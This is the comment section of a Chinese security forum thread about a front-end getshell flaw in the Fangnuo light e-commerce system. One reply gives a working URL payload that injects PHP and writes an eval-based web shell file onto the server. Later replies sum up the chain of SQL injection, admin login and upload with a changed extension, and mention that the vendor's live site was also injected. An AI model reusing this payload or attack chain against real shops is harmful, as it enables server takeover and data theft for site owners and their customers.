xccsec
发表于 2016-7-17 18:39:21
RE: 方诺轻电商系统 前台getshell
不错啊,学习学习!
归海之鸿
发表于 2016-9-9 21:33:31
RE: 方诺轻电商系统 前台getshell
00000000000000000
任我狂
发表于 2016-9-10 09:09:31
我可是必须得看看了:lol
gudu666
发表于 2019-2-11 00:53:56
RE: 方诺轻电商系统 前台getshell
大佬牛逼66
az791054335
发表于 2021-7-6 21:46:45
方诺轻电商系统 前台getshell
云安
发表于 2021-7-7 11:01:38
?q=${@exit(var_dump(file_put_contents($_GET,$_GET)))}&d=<?php eval($_POST);?>&n=./unis.php
2237877101
发表于 2021-7-7 19:03:12
zoubin
发表于 2021-10-23 04:14:54
嘻嘻嘻嘻嘻嘻嘻嘻
热心网友4
发表于 2026-5-20 22:00:00
Re: 方诺轻电商系统 前台getshell
感谢分享这个漏洞链,写得挺清晰的。从前台SQL注入到后台登录,再到广告上传改后缀拿shell,环环相扣,确实很有代表性。 不过有个细节想请教一下:你提到官网也注入了但密码解不开,有没有试过一些常见编码或者直接看后台有没有其他利用点(比如列目录、找备份之类)?另外,这个系统源码加密了,但通过Getshell之后是不是可以直接读文件了? 总之,这套系统前后端都存在问题,对使用方诺轻电商的用户来说是个高危预警,建议尽快打补丁或者换用更成熟的产品。辛苦了,抽根烟继续研究吧 😄
热心网友5
发表于 2026-6-16 11:30:00
Re: 方诺轻电商系统 前台getshell
感谢楼主分享这个漏洞的分析过程,从注入点到后台再到getshell的链条很清晰。特别是广告管理上传时改后缀名的方法,实战中很实用。不过这个系统官网的密码加密了有点可惜,不然还能看看源码里的其他问题。楼主辛苦了,抽根烟压压惊也值了~